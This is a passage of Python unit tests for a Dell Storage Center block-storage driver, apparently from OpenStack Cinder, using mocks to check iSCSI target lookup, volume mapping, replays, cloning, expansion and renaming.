self.assertTrue(mock_find_active_controller.called)
expected = {'target_discovered': False,
'target_iqn':
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
'target_iqns':
[u'iqn.2002-03.com.compellent:5000d31000fcbe43'],
'target_lun': 1,
'target_luns': [1],
'target_portal': u'192.168.0.21:3260',
'target_portals': [u'192.168.0.21:3260']}
self.assertEqual(expected, res, 'Wrong Target Info')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.5764839588723736131.91')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port_iscsi_config',
return_value=None)
def test_find_iscsi_properties_mappings_legacy_no_iscsi_config(
self,
mock_find_controller_port_iscsi_config,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_ctrl_port,
mock_find_active_controller,
mock_close_connection,
mock_open_connection,
mock_init):
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.find_iscsi_properties,
self.VOLUME)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_controller_port_iscsi_config.called)
self.assertTrue(mock_find_active_controller.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.64702')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port_iscsi_config',
return_value=ISCSI_CONFIG)
def test_find_iscsi_properties_by_address_legacy(
self,
mock_find_controller_port_iscsi_config,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_ctrl_port,
mock_find_active_controller,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case to find iSCSI mappings by IP Address & port
res = self.scapi.find_iscsi_properties(
self.VOLUME, '192.168.0.21', 3260)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_active_controller.called)
self.assertTrue(mock_find_controller_port_iscsi_config.called)
expected = {'target_discovered': False,
'target_iqn':
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
'target_iqns':
[u'iqn.2002-03.com.compellent:5000d31000fcbe43'],
'target_lun': 1,
'target_luns': [1],
'target_portal': u'192.168.0.21:3260',
'target_portals': [u'192.168.0.21:3260']}
self.assertEqual(expected, res, 'Wrong Target Info')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.64702')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port_iscsi_config',
return_value=ISCSI_CONFIG)
def test_find_iscsi_properties_by_address_not_found_legacy(
self,
mock_find_controller_port_iscsi_config,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_ctrl_port,
mock_find_active_ctrl,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case to find iSCSI mappings by IP Address & port are not found
res = self.scapi.find_iscsi_properties(
self.VOLUME, '192.168.1.21', 3260)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_active_ctrl.called)
self.assertTrue(mock_find_controller_port_iscsi_config.called)
expected = {'target_discovered': False,
'target_iqn':
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
'target_iqns':
[u'iqn.2002-03.com.compellent:5000d31000fcbe43'],
'target_lun': 1,
'target_luns': [1],
'target_portal': u'192.168.0.21:3260',
'target_portals': [u'192.168.0.21:3260']}
self.assertEqual(expected, res, 'Wrong Target Info')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.64702')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS_READ_ONLY)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port_iscsi_config',
return_value=ISCSI_CONFIG)
def test_find_iscsi_properties_ro_legacy(self,
mock_find_iscsi_config,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_ctrl_port,
mock_find_active_controller,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where Read Only mappings are found
res = self.scapi.find_iscsi_properties(self.VOLUME)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_active_controller.called)
self.assertTrue(mock_find_iscsi_config.called)
expected = {'target_discovered': False,
'target_iqn':
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
'target_iqns':
[u'iqn.2002-03.com.compellent:5000d31000fcbe43'],
'target_lun': 1,
'target_luns': [1],
'target_portal': u'192.168.0.21:3260',
'target_portals': [u'192.168.0.21:3260']}
self.assertEqual(expected, res, 'Wrong Target Info')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.64702')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS_MULTI_PORTAL)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port_iscsi_config',
return_value=ISCSI_CONFIG)
def test_find_iscsi_properties_multi_portals_legacy(
self,
mock_find_controller_port_iscsi_config,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_ctrl_port,
mock_find_active_controller,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where there are multiple portals
res = self.scapi.find_iscsi_properties(self.VOLUME)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_active_controller.called)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_controller_port_iscsi_config.called)
# Since we're feeding the same info back multiple times the information
# will be duped.
expected = {'target_discovered': False,
'target_iqn':
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
'target_iqns':
[u'iqn.2002-03.com.compellent:5000d31000fcbe43',
u'iqn.2002-03.com.compellent:5000d31000fcbe43'],
'target_lun': 1,
'target_luns': [1, 1],
'target_portal': u'192.168.0.21:3260',
'target_portals': [u'192.168.0.21:3260',
u'192.168.0.21:3260']}
self.assertEqual(expected, res, 'Wrong Target Info')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=MAP_PROFILE)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mapping_profiles',
return_value=[])
def test_map_volume(self,
mock_find_mapping_profiles,
mock_post,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.map_volume(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_mapping_profiles.called)
self.assertTrue(mock_post.called)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.MAP_PROFILE, res, 'Incorrect ScMappingProfile')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=MAP_PROFILE)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mapping_profiles',
return_value=MAP_PROFILES)
def test_map_volume_existing_mapping(self,
mock_find_mappings,
mock_post,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.map_volume(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_mappings.called)
self.assertFalse(mock_post.called)
self.assertFalse(mock_first_result.called)
self.assertEqual(self.MAP_PROFILE, res, 'Incorrect ScMappingProfile')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=MAP_PROFILE)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mapping_profiles',
return_value=[])
def test_map_volume_existing_mapping_not_us(self,
mock_find_mappings,
mock_post,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
server = {'instanceId': 64702.48, 'name': 'Server X'}
res = self.scapi.map_volume(self.VOLUME,
server)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_post.called)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.MAP_PROFILE, res, 'Incorrect ScMappingProfile')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post')
def test_map_volume_no_vol_id(self,
mock_post,
mock_first_result,
mock_get_id,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where ScVolume instanceId is None
mock_get_id.side_effect = [None, '64702.47']
res = self.scapi.map_volume(self.VOLUME,
self.SCSERVER)
self.assertFalse(mock_post.called)
self.assertFalse(mock_first_result.called)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post')
def test_map_volume_no_server_id(self,
mock_post,
mock_first_result,
mock_get_id,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where ScVolume instanceId is None
mock_get_id.side_effect = ['64702.3494', None]
res = self.scapi.map_volume(self.VOLUME,
self.SCSERVER)
self.assertFalse(mock_post.called)
self.assertFalse(mock_first_result.called)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mapping_profiles',
return_value=[])
def test_map_volume_failure(self,
mock_find_mapping_profiles,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where mapping volume to server fails
res = self.scapi.map_volume(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_mapping_profiles.called)
self.assertTrue(mock_post.called)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mapping_profiles',
return_value=MAP_PROFILES)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value={'result': True})
def test_unmap_volume(self,
mock_get_json,
mock_find_mapping_profiles,
mock_delete,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.unmap_volume(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_mapping_profiles.called)
self.assertTrue(mock_delete.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mapping_profiles',
return_value=MAP_PROFILES)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_204)
def test_unmap_volume_failure(self,
mock_delete,
mock_find_mapping_profiles,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.unmap_volume(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_mapping_profiles.called)
self.assertTrue(mock_delete.called)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mapping_profiles',
return_value=[])
def test_unmap_volume_no_map_profile(self,
mock_find_mapping_profiles,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.unmap_volume(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_mapping_profiles.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_204)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mapping_profiles',
return_value=MAP_PROFILES)
def test_unmap_volume_del_fail(self,
mock_find_mapping_profiles,
mock_delete,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.unmap_volume(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_mapping_profiles.called)
self.assertTrue(mock_delete.called)
self.assertFalse(res, False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mapping_profiles',
return_value=MAP_PROFILES)
def test_unmap_volume_no_vol_id(self,
mock_find_mapping_profiles,
mock_delete,
mock_get_id,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where ScVolume instanceId = None
mock_get_id.side_effect = [None, '64702.47']
res = self.scapi.unmap_volume(self.VOLUME,
self.SCSERVER)
self.assertFalse(mock_find_mapping_profiles.called)
self.assertFalse(mock_delete.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mapping_profiles',
return_value=MAP_PROFILES)
def test_unmap_volume_no_server_id(self,
mock_find_mapping_profiles,
mock_delete,
mock_get_id,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where ScVolume instanceId = None
mock_get_id.side_effect = ['64702.3494', None]
res = self.scapi.unmap_volume(self.VOLUME,
self.SCSERVER)
self.assertFalse(mock_find_mapping_profiles.called)
self.assertFalse(mock_delete.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[{'a': 1}, {'a': 2}])
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_controller_port_iscsi_config(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
# Not much to test here. Just make sure we call our stuff and
# that we return the first item returned to us.
res = self.scapi._find_controller_port_iscsi_config('guid')
self.assertTrue(mock_get.called)
self.assertTrue(mock_get_json.called)
self.assertEqual({'a': 1}, res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
def test_find_controller_port_iscsi_config_err(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_controller_port_iscsi_config('guid')
self.assertTrue(mock_get.called)
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=STRG_USAGE)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_get_storage_usage(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.get_storage_usage()
self.assertTrue(mock_get.called)
self.assertTrue(mock_get_json.called)
self.assertEqual(self.STRG_USAGE, res, 'Unexpected ScStorageUsage')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_204)
def test_get_storage_usage_no_ssn(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where SSN is none
self.scapi.ssn = None
res = self.scapi.get_storage_usage()
self.scapi.ssn = 12345
self.assertFalse(mock_get.called)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_204)
# Test case where get of Storage Usage fails
def test_get_storage_usage_failure(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.get_storage_usage()
self.assertTrue(mock_get.called)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=RPLAY)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_create_replay(self,
mock_post,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.create_replay(self.VOLUME,
'Test Replay',
60)
self.assertTrue(mock_post.called)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.RPLAY, res, 'Unexpected ScReplay')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=RPLAY)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_init_volume')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_create_replay_inact_vol(self,
mock_post,
mock_init_volume,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where the specified volume is inactive
res = self.scapi.create_replay(self.INACTIVE_VOLUME,
'Test Replay',
60)
self.assertTrue(mock_post.called)
mock_init_volume.assert_called_once_with(self.INACTIVE_VOLUME)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.RPLAY, res, 'Unexpected ScReplay')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=RPLAY)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_create_replay_no_expire(self,
mock_post,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.create_replay(self.VOLUME,
'Test Replay',
0)
self.assertTrue(mock_post.called)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.RPLAY, res, 'Unexpected ScReplay')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_create_replay_no_volume(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where no ScVolume is specified
res = self.scapi.create_replay(None,
'Test Replay',
60)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test_create_replay_failure(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where create ScReplay fails
res = self.scapi.create_replay(self.VOLUME,
'Test Replay',
60)
self.assertTrue(mock_post.called)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=RPLAYS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_replay(self,
mock_post,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.find_replay(self.VOLUME,
u'Cinder Test Replay012345678910')
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
self.assertEqual(self.TST_RPLAY, res, 'Unexpected ScReplay')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[])
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_replay_no_replays(self,
mock_post,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where no replays are found
res = self.scapi.find_replay(self.VOLUME,
u'Cinder Test Replay012345678910')
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=None)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_204)
def test_find_replay_failure(self,
mock_post,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where None is returned for replays
res = self.scapi.find_replay(self.VOLUME,
u'Cinder Test Replay012345678910')
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_replay',
return_value=RPLAYS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test_delete_replay(self,
mock_post,
mock_find_replay,
mock_close_connection,
mock_open_connection,
mock_init):
replayId = u'Cinder Test Replay012345678910'
res = self.scapi.delete_replay(self.VOLUME,
replayId)
self.assertTrue(mock_post.called)
mock_find_replay.assert_called_once_with(self.VOLUME, replayId)
self.assertTrue(res, 'Expected True')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_replay',
return_value=None)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test_delete_replay_no_replay(self,
mock_post,
mock_find_replay,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where specified ScReplay does not exist
replayId = u'Cinder Test Replay012345678910'
res = self.scapi.delete_replay(self.VOLUME,
replayId)
self.assertFalse(mock_post.called)
mock_find_replay.assert_called_once_with(self.VOLUME, replayId)
self.assertTrue(res, 'Expected True')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_replay',
return_value=TST_RPLAY)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
def test_delete_replay_failure(self,
mock_post,
mock_find_replay,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where delete ScReplay results in an error
replayId = u'Cinder Test Replay012345678910'
res = self.scapi.delete_replay(self.VOLUME,
replayId)
self.assertTrue(mock_post.called)
mock_find_replay.assert_called_once_with(self.VOLUME, replayId)
self.assertFalse(res, 'Expected False')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=VOLUME)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_volume_folder',
return_value=FLDR)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_create_view_volume(self,
mock_post,
mock_find_volume_folder,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
vol_name = u'Test_create_vol'
res = self.scapi.create_view_volume(
vol_name,
self.TST_RPLAY,
None)
self.assertTrue(mock_post.called)
mock_find_volume_folder.assert_called_once_with(True)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.VOLUME, res, 'Unexpected ScVolume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=VOLUME)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_volume_folder',
return_value=None)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_create_view_volume_create_fldr(self,
mock_post,
mock_find_volume_folder,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where volume folder does not exist and must be created
vol_name = u'Test_create_vol'
res = self.scapi.create_view_volume(
vol_name,
self.TST_RPLAY,
None)
self.assertTrue(mock_post.called)
mock_find_volume_folder.assert_called_once_with(True)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.VOLUME, res, 'Unexpected ScVolume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=VOLUME)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_volume_folder',
return_value=None)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_create_view_volume_no_vol_fldr(self,
mock_post,
mock_find_volume_folder,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where volume folder does not exist and cannot be created
vol_name = u'Test_create_vol'
res = self.scapi.create_view_volume(
vol_name,
self.TST_RPLAY,
None)
self.assertTrue(mock_post.called)
mock_find_volume_folder.assert_called_once_with(True)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.VOLUME, res, 'Unexpected ScVolume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_volume_folder',
return_value=FLDR)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test_create_view_volume_failure(self,
mock_post,
mock_find_volume_folder,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where view volume create fails
vol_name = u'Test_create_vol'
res = self.scapi.create_view_volume(
vol_name,
self.TST_RPLAY,
None)
self.assertTrue(mock_post.called)
mock_find_volume_folder.assert_called_once_with(True)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'create_view_volume',
return_value=VOLUME)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'create_replay',
return_value=RPLAY)
def test_create_cloned_volume(self,
mock_create_replay,
mock_create_view_volume,
mock_close_connection,
mock_open_connection,
mock_init):
vol_name = u'Test_create_clone_vol'
res = self.scapi.create_cloned_volume(
vol_name,
self.VOLUME,
['Daily'])
mock_create_replay.assert_called_once_with(self.VOLUME,
'Cinder Clone Replay',
60)
mock_create_view_volume.assert_called_once_with(
vol_name,
self.RPLAY,
['Daily'])
self.assertEqual(self.VOLUME, res, 'Unexpected ScVolume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'create_view_volume',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'create_replay')
def test_create_cloned_volume_failure(self,
mock_create_replay,
mock_create_view_volume,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where create cloned volumes fails because create_replay
# fails
vol_name = u'Test_create_clone_vol'
mock_create_replay.return_value = None
res = self.scapi.create_cloned_volume(
vol_name,
self.VOLUME,
['Daily'])
mock_create_replay.assert_called_once_with(self.VOLUME,
'Cinder Clone Replay',
60)
self.assertFalse(mock_create_view_volume.called)
self.assertIsNone(res, 'Expected None')
# Again buy let create_view_volume fail.
mock_create_replay.return_value = self.RPLAY
res = self.scapi.create_cloned_volume(
vol_name,
self.VOLUME,
['Daily'])
mock_create_view_volume.assert_called_once_with(
vol_name,
self.RPLAY,
['Daily'])
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=VOLUME)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_expand_volume(self,
mock_post,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.expand_volume(self.VOLUME, 550)
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
self.assertEqual(self.VOLUME, res, 'Unexpected ScVolume')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test_expand_volume_failure(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.expand_volume(self.VOLUME, 550)
self.assertTrue(mock_post.called)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'put',
return_value=RESPONSE_200)
def test_rename_volume(self,
mock_put,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.rename_volume(self.VOLUME, 'newname')
self.assertTrue(mock_put.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'put',
return_value=RESPONSE_400)
def test_rename_volume_failure(self,
mock_put,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.rename_volume(self.VOLUME, 'newname')
self.assertTrue(mock_put.called)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_200)
def test_delete_server(self,
mock_delete,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._delete_server(self.SCSERVER)
self.assertTrue(mock_delete.called)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_200)
def test_delete_server_del_not_allowed(self,
mock_delete,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where delete of ScServer not allowed
res = self.scapi._delete_server(self.SCSERVER_NO_DEL)
self.assertFalse(mock_delete.called)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value={'test': 'test'})
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_get_user_preferences(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
# Not really testing anything other than the ability to mock, but
# including for completeness.
res = self.scapi._get_user_preferences()
self.assertEqual({'test': 'test'}, res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
def test_get_user_preferences_failure(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._get_user_preferences()
self.assertEqual({}, res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_user_preferences',
return_value=None)
def test_update_storage_profile_noprefs(self,
mock_prefs,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.update_storage_profile(None, None)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_user_preferences',
return_value={'allowStorageProfileSelection': False})
def test_update_storage_profile_not_allowed(self,
mock_prefs,
mock_close_connection,
mock_open_connection,
mock_init):
LOG = self.mock_object(dell_storagecenter_api, "LOG")
res = self.scapi.update_storage_profile(None, None)
self.assertFalse(res)
self.assertEqual(1, LOG.error.call_count)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_storage_profile',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_user_preferences',
